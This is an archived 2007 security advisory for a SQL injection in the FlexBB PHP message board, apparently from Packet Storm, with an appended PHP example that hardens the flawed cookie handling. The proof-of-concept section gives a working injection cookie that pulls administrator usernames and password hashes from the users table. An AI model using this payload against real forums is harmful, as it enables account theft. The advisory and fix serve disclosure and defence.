advisory-481.txt

2007-03-29T00:00:00
ID PACKETSTORM:55443
Type packetstorm
Reporter trueend5
Modified 2007-03-29T00:00:00

Description

                                        
                                            `  
KAPDA New advisory  
Vendor: http://www.flexbb.net  
Vulnerable Version: 1.0.0 10005 Beta Release 1  
Bug: SQL Injection  
Exploitation: Remote with browser  
  
Description:  
--------------------  
Flexbb is a freely available PHP-based message board  
program that uses a MySQL database.  
  
Vulnerability:  
--------------------  
SQL Injection:  
The software does not properly validate user-supplied  
input, which may allow a remote user to launch SQL  
injection attacks.  
There are multiple input validation errors, for  
example:  
// Code Snippet  
// Includes/Start.php  
// Lines #190-197  
if($_COOKIE['flexbb_lang_id'] == "")  
{  
    $lang_id = $config['default_lang_id'];  
}  
else  
{  
    $lang_id = $_COOKIE['flexbb_lang_id']; // ---> Input Validation Error  
}  
  
POC:  
--------------------  
Condition: Magic quotes GPC = Off  
GET: http://example.com/flexbb/index.php?debug=1  
Cookie Name = flexbb_lang_id  
Cookie Value = none' UNION SELECT 'en',`username`,  
`password`,1,1 FROM `flexbb_users` WHERE `group` = '4  
  
Original Advisory:  
--------------------  
http://www.kapda.ir/advisory-481.html  
  
Solution:  
--------------------  
No response from vendor; there is no solution at the  
time of this entry.  
  
Credit :  
--------------------  
Discovered & released by trueend5 (trueend5 kapda ir)  
Security Science Researchers Institute Of Iran  
[http://www.KAPDA.ir]  
  
  
  
  
`
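
One way to harden the Includes/Start.php cookie handling quoted in the advisory, shown as an added example (not FlexBB or KAPDA code): the cookie is checked against an expected format and then looked up with a bound parameter, so it never becomes part of the SQL text. The flexbb_languages table, its lang_id column, the id format, the 'en' default and the sample rows are assumptions; an in-memory SQLite database (pdo_sqlite) stands in for MySQL so the script runs offline.

```php
<?php
// Added example, not FlexBB code. Table/column names and the id format are assumptions.

// Assumed format of a language id: a short token such as "en" or "1".
const LANG_ID_PATTERN = '/\A[A-Za-z0-9_-]{1,16}\z/';

// Return a language id that exists in the database, or the configured default.
function resolve_lang_id(PDO $db, array $cookies, string $default): string
{
    $raw = $cookies['flexbb_lang_id'] ?? '';
    // Reject array-valued cookies and anything outside the expected format.
    if (!is_string($raw) || preg_match(LANG_ID_PATTERN, $raw) !== 1) {
        return $default;
    }
    // Bound parameter: the value is never concatenated into the SQL text.
    $stmt = $db->prepare('SELECT lang_id FROM flexbb_languages WHERE lang_id = ?');
    $stmt->execute([$raw]);
    $found = $stmt->fetchColumn();
    return $found === false ? $default : (string) $found;
}

// Constructed stand-in database (FlexBB itself uses MySQL).
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec("CREATE TABLE flexbb_languages (lang_id TEXT PRIMARY KEY, name TEXT)");
$db->exec("INSERT INTO flexbb_languages VALUES ('en', 'English'), ('fa', 'Farsi')");

// Constructed sample cookies; 'en' plays the role of $config['default_lang_id'].
$samples = [
    ['flexbb_lang_id' => 'fa'],                  // known id, accepted
    [],                                          // cookie absent, default used
    ['flexbb_lang_id' => "none' UNION SELECT"],  // quote and spaces fail the format check
    ['flexbb_lang_id' => 'zz'],                  // well-formed but not installed
];
foreach ($samples as $cookies) {
    echo json_encode($cookies), ' => ', resolve_lang_id($db, $cookies, 'en'), PHP_EOL;
}
```

With these sample rows only the first cookie resolves to 'fa'; the other three fall back to 'en'.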